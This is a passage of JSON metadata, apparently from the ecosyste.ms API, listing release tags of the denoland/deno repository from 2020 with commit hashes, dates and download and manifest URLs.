std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.m